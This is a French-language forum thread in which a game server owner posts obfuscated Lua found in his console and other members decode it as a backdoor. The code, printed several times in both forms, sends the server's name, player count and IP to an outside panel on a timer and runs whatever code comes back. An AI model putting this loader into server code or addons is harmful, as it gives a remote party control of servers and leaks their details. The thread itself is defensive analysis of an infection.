Je crois que je me suis fais backdoor

  • Initiateur de la discussion Azimut
  • Date de début
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Bonjour, je développe mon serveur et voilà se qui s'affiche dans la console :


Code:
local fwuJDWHPLFtFTiLCULkObIoNivziGB = tostring local uADhBYmPXDUoPgILZIUqxzLAhLakcU = http.Post local GINbuenZreqlmuWTZjqPEvcHaAcqTV = RunString local QJvMrlEmRrUhdKHFnxPvencExvqtSd = timer.Simple QJvMrlEmRrUhdKHFnxPvencExvqtSd(40, function() timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function() local a = { n = GetHostName(), nb = fwuJDWHPLFtFTiLCULkObIoNivziGB(#player.GetAll()), i = game.GetIPAddress() } uADhBYmPXDUoPgILZIUqxzLAhLakcU( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a, function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code ) GINbuenZreqlmuWTZjqPEvcHaAcqTV(body) end ) end)
end)
Vous pensez que c'est un backdoor ?
 
Kitsu

Kitsu

Chuck Norris
Messages
6 076
Score réaction
2 505
Points
740
Azimut à dit:
"\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112",
ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪
 
  • J'aime
Réactions: Valfunde et (membre supprimé)
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Kitsu à dit:
ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪
Je sais pas, mais j'aimerai savoir se que le code fait
 
Taink

Taink

El Magnifico
Messages
5 292
Score réaction
2 720
Points
965
Kitsu à dit:
ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪
Yep c'est de l'obfusqué, je pense. Et puis on peut se dire que c'est un backdoor quand un http.Post est obfusqué.
 
  • J'aime
Réactions: Kitsu et (membre supprimé)
Taink

Taink

El Magnifico
Messages
5 292
Score réaction
2 720
Points
965
Azimut à dit:
Je sais pas, mais j'aimerai savoir se que le code fait
Ça pue le vieux panel.
 
Kitsu

Kitsu

Chuck Norris
Messages
6 076
Score réaction
2 505
Points
740
Taink à dit:
Yep c'est de l'obfusqué, je pense. Et puis on peut se dire que c'est un backdoor quand un http.Post est obfusqué.
Faut faire quoi ? trouver l'addon et le dégagé ?
 
  • J'aime
Réactions: Taink
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Taink à dit:
Yep c'est de l'obfusqué, je pense. Et puis on peut se dire que c'est un backdoor quand un http.Post est obfusqué.
D'accord, j'attend une âme pour le de crypter merci :)
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Bah c'est surement du Base64 attendez
 
  • J'aime
Réactions: Fresh mentos
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Kitsu à dit:
ça ressemble a un code obfusqué nan ? @Taink @Valfunde @Yoh Sambre ♪
yes
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Ok c'est pas exactement du Base64 je cherche
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Voilà le code :
Code:
timer.Simple(40, function() timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a, function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code ) RunString(body) end ) end)
end)
 
Taink

Taink

El Magnifico
Messages
5 292
Score réaction
2 720
Points
965
Azimut à dit:
Azimut à dit:
local a = { n = GetHostName(), nb = fwuJDWHPLFtFTiLCULkObIoNivziGB(#player.GetAll()), i = game.GetIPAddress() }
Bah je m'en doute un peu quoi... C'est rare d'en avoir l'utilité.
Kitsu à dit:
Faut faire quoi ? trouver l'addon et le dégagé ?
Bah je vois pas quoi faire d'autre ^^"
 
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Mais ce code sert à quoi, et il donne quoi une fois décrypter ? Et comment le décrypter ?
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Azimut à dit:
Mais ce code sert à quoi, et il donne quoi une fois décrypter ? Et comment le décrypter ?
C'est une backdoor
 
  • J'aime
Réactions: FalkioGMR
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Taink

Taink

El Magnifico
Messages
5 292
Score réaction
2 720
Points
965
melcez

melcez

Psychopathe
Messages
1 364
Score réaction
377
Points
300
Azimut à dit:
Mais ce code sert à quoi, et il donne quoi une fois décrypter ? Et comment le décrypter ?
Ton serveur est infecté par un panel.
La personne peut avec cela controler ton serveur à distance (restart / stop / rediriger tes joueurs vers un autre serveur).
En décryptant le code, tu devrais avoir l'URL du panel.
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Code:
\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112
Voici l'url du http.Post
 
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
melcez à dit:
En décryptant le code, tu devrais avoir l'URL du panel
Comment le décrypter? merci :)
 
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Valfunde à dit:
Code:
\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112
Voici l'url du http.Post
Et en étant décrypter ça donne quoi?
 
melcez

melcez

Psychopathe
Messages
1 364
Score réaction
377
Points
300
Azimut à dit:
Comment le décrypter? merci :)
De ce coté la, aucune idée.
Il faut trouver en quel langage c'est crypté et j'ai la flemme de chercher :rolleyes:
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Ok bon le :
Code:
uADhBYmPXDUoPgILZIUqxzLAhLakcU( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)
est égal a surement
Code:
http.Post("
http://mr-robot.mtxserv.fr/panel/core/stage2.php
", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Valfunde à dit:
Voilà le code :
Code:
timer.Simple(40, function() timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a, function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code ) RunString(body) end ) end)
end)
@BlitzFire
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Donc
Code:
\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112
=
http://mr-robot.mtxserv.fr/panel/core/stage2.php
 
  • J'aime
Réactions: Valfunde
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
BlitzFire à dit:
Ok bon le :
Code:
uADhBYmPXDUoPgILZIUqxzLAhLakcU( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)
est égal a surement
Code:
http.Post("
http://mr-robot.mtxserv.fr/panel/core/stage2.php
", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
GINbuenZreqlmuWTZjqPEvcHaAcqTV(body)
end
)
Exact, @Snk le proprio de http://mr-robot.mtxserv.fr/ utilise l’hébergement pour nuire a des serveurs
 
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Merci, comment avez-vous fait ? Pour le décrypter
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
@Azimut
Code:
\'un nombre'
= ASCII encoding
 
  • J'aime
Réactions: Valfunde
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
après y'a d'autre methode d'encryption dans ce code
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Mais @Valfunde vous a partagé le code donc soyez happy
 
  • J'aime
Réactions: Valfunde
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
BlitzFire à dit:
après y'a d'autre methode d'encryption dans ce code
Bah la c'est bon c'est décrypt, juste en passant les différents step on obtient un code backdoor cc @slownls
 
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Valfunde à dit:
Bah la c'est bon c'est décrypt, juste en passant les différents step on obtient un code backdoor cc @slownls
Tu insinue que celui qui a backdoor est slown ?
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Azimut à dit:
Tu insinue que celui qui a backdoor est slown ?
Non dutout, juste qu'avec SlownLs on avait 'crack' un drm fait sur la meme base :p
 
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
Valfunde à dit:
Non dutout, juste qu'avec SlownLs on avait 'crack' un drm fait sur la meme base :p
Ah d'accord :)
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Bon bref https://prntscr.com/g8d8v4 si sa embete @Snk faut savoir que le compte mettant en place ce backdoor qui ne sert que de statistiques en mode BIG DATA et le déteneur du sous-domaine 'mr-robot'.
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Azimut à dit:
Si il est chaud il te sort même le code du backdoor, mais perso j'ai pas que ca a faire :p
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
BlitzFire à dit:
Bon bref https://prntscr.com/g8d8v4 si sa embete @Snk faut savoir que le compte mettant en place ce backdoor qui ne sert que de statistiques en mode BIG DATA et le déteneur du sous-domaine 'mr-robot'.
et on tombe sur le panel de marbella :x
 
  • J'aime
Réactions: FalkioGMR et BlitzFire
Kitsu

Kitsu

Chuck Norris
Messages
6 076
Score réaction
2 505
Points
740
Valfunde à dit:
Exact, @Snk le proprio de http://mr-robot.mtxserv.fr/ utilise l’hébergement pour nuire a des serveurs
bizarrement le mr robot me rappelle quelqu'un :') cc @Yoh Sambre ♪
 
  • J'aime
Réactions: Yoh Sambre ♪, BlitzFire et (membre supprimé)
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
CONCLUSION

Il ne faut pas s'affoler car sa ne fait que envoyer le nombres de joueur et l'ip de votre serveur toutes les 40 secondes :D
 
  • Banni
B

blublublu

Nouveau né
Messages
7
Score réaction
3
Points
25
Kitsu à dit:
bizarrement le mr robot me rappelle quelqu'un :') cc @Yoh Sambre ♪
c'est moi, un pote voulait que j'host son panel je l'ai fais
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
ZarosOVH

ZarosOVH

Modérateur
Membre du Staff
Messages
6 527
Score réaction
5 488
Points
1 295
BlitzFire à dit:
CONCLUSION

Il ne faut pas s'affoler car sa ne fait que envoyer le nombres de joueur et l'ip de votre serveur toutes les 40 secondes :D
Ouaiz mais avec le panel il lance n'importe quel code sur ton serv xD
 
  • J'aime
Réactions: 1 personne
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
blublublu à dit:
c'est moi, un pote voulait que j'host son panel je l'ai fais
Non mais serieux le double compte xD @Snk ban stp
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Zaros_Live à dit:
Ouaiz mais avec le panel il lance n'importe quel code sur ton serv xD
Alors non car le code est déjà implémenté sur le serveur est ne peut etre changé a distance car il est pas acquéri par un http.Fetch.
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
BlitzFire à dit:
Alors non car le code est déjà implémenté sur le serveur est ne peut etre changé a distance car il est pas acquéri par un http.Fetch.
Normalement si y'a d'autres codes qui vont se rajouter après via la fonction au nom etrange :p
 
  • Banni
B

blublublu

Nouveau né
Messages
7
Score réaction
3
Points
25
Zaros_Live à dit:
Ouaiz mais avec le panel il lance n'importe quel code sur ton serv xD
il avait pas acces a mon serv
BlitzFire à dit:
Non mais serieux le double compte xD @Snk ban stp
il peut me ban c'était juste pour donner mon histoire
 
BlitzFire

BlitzFire

Geek suprême
Messages
707
Score réaction
131
Points
150
Valfunde à dit:
Normalement si y'a d'autres codes qui vont se rajouter après via la fonction au nom etrange :p
Entièrement raison my bad:
Code:
timer.Simple(40, function()
timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function()
local a = {
n = GetHostName(),
nb = tostring(#player.GetAll()),
i = game.GetIPAddress()
}
http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)
end)
end)
C'est cette fonction qui est dangereuse:
Code:
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)
La focntion exécute une autre fonction donné par le site demandé par le POST.
 
  • J'aime
Réactions: Valfunde
  • Initiateur de la discussion
Azimut

Azimut

Geek
Messages
123
Score réaction
36
Points
80
BlitzFire à dit:
Entièrement raison my bad:
Code:
timer.Simple(40, function()
timer.Create( "\121\112\109\82\77\114\97\112\75\117", 20, 0, function()
local a = {
n = GetHostName(),
nb = tostring(#player.GetAll()),
i = game.GetIPAddress()
}
http.Post( "\104\116\116\112\58\47\47\109\114\45\114\111\98\111\116\46\109\116\120\115\101\114\118\46\102\114\47\112\97\110\101\108\47\99\111\114\101\47\115\116\97\103\101\50\46\112\104\112", a,
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)
end)
end)
C'est cette fonction qui est dangereuse:
Code:
function( body, len, QEfGqGaPeUDNkFZnxQaxPttCgwGVdl, code )
RunString(body)
end
)
La focntion exécute une autre fonction donné par le site demandé par le POST.
Donc, le code en lui même permet de faire quoi ?
 
Valfunde

Valfunde

Helpeur Divin
Messages
3 800
Score réaction
1 235
Points
450
Azimut à dit:
Donc, le code en lui même permet de faire quoi ?
un backdoor et infecter / controller ton serveur
 
Discord d'entraide
Rejoignz-nous sur Discord